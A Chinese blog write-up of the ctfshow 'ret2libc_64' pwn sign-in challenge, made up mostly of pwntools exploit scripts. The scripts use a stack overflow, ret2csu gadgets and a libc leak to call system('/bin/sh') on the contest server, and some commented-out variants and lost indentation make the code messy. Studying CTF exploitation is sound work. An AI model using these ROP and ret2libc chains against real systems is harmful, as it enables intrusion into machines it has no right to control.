ctfshow 内部赛 pwn 签到题
找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。
先放图片,2021.11.16该代码可行
这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及gets写bss段] 之前用常规的write函数泄露ROP出现问题,以及 这里 的博客与 这里 的博客exp不知为何我这里无法使用(可能题目更新了)
代码如下(没用的注释删掉就好了hhhh)
#!/usr/bin/env python
# encoding: utf-8
'''
from pwn import*
from LibcSearcher import *
context.log_level = "debug"
r = remote('pwn.challenge.ctf.show',28098)
#r=process('./ret2libc_64')
elf = ELF('./ret2libc_64')
puts_plt=elf.plt['write']
puts_got=elf.got['gets']
main=elf.sym['main']
print(hex(main))
'''
pop_rdi=0x0004006c3
pop_ret=0x0004004a9
'''
rsi_r15 = 0x00000000004006c1
payload='a'*160+'a'*8+p64(pop_rdi)+p64(1)+p64(rsi_r15)+p64(puts_got)+p64(0)+p64(puts_plt)+p64(main)
r.recvuntil('now,Try Pwn Me?\n')
r.sendline(payload)
#r.recvuntil('now,Try Pwn Me?\n')
puts_addr = u64(r.recv(6).ljust(8, '\x00'))#ok
#puts_addr = u64(r.recv(7).ljust(8, '\x00'))#?
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\x00'))#?
#puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#ok
'''
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
sh = process('./ret2libc_64')
sh = remote('pwn.challenge.ctf.show',28098)
elf = ELF('./ret2libc_64')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc = ELF('../../tools/libc-database/db/libc6_2.23-0ubuntu10_amd64.so')
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
gadgets1 = 0x00000000004006B6
gadgets2 = 0x00000000004006A0
write_got = elf.got['write']
main_addr = elf.symbols['main']
offset = 'a'*168
def csu(r12,r13,r14,r15,ret_addr):
payload = offset
payload += p64(gadgets1)
payload += "b"*8
payload += p64(0)
payload += p64(1)
payload += p64(r12)
payload += p64(r15)
payload += p64(r14)
payload += p64(r13)
payload += p64(gadgets2)
payload += "c"*56
payload += p64(ret_addr)
sh.sendline(payload)
sh.recvuntil("Pwn Me?\n")
csu(write_got,1,write_got,8,main_addr)
write_addr = u64(sh.recv(8))
print "write:",hex(write_addr)
#print(hex(puts_addr))
libc=LibcSearcher('write',write_addr)#libcsearcher
libcbase=write_addr-libc.dump('write')
system_addr=libcbase+libc.dump('system')
bin_sh_addr=libcbase+libc.dump('str_bin_sh')
'''
libc_puts=0x0809c0
libc_sys=0x04f440
libc_bin=0x1b3e9a
offset = puts_addr - libc_puts#libcsearcher无法使用时
system_addr=offset+ libc_sys
bin_sh_addr=offset+ libc_bin
'''
payload='a'*160+'a'*8+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
#payload='a'*160+'a'*8+p64(pop_ret)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)#这个pop_ret是栈对齐的东西
sh.recvuntil('now,Try Pwn Me?\n')
sh.sendline(payload)
sh.interactive()
'''
from pwn import *
from LibcSearcher import *
io = remote('pwn.challenge.ctf.show',28092)
elf = ELF('./ret2libc_64')
context.log_level = 'debug'
rdi = 0x00000000004006c3
rsi_r15 = 0x00000000004006c1
main = 0x4005FD
payload = 'a'*0xa0+'a'*0x8 + p64(rdi) + p64(1)+p64(rsi_r15)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(main)
io.sendline(payload)
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc = LibcSearcher('write',leak)
offset = leak - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
payload = 'a'*0xa0+'a'*0x8 + p64(rdi)+p64(binsh)+p64(system)
io.recvuntil('Me?\n')
io.sendline(payload)
io.interactive()
'''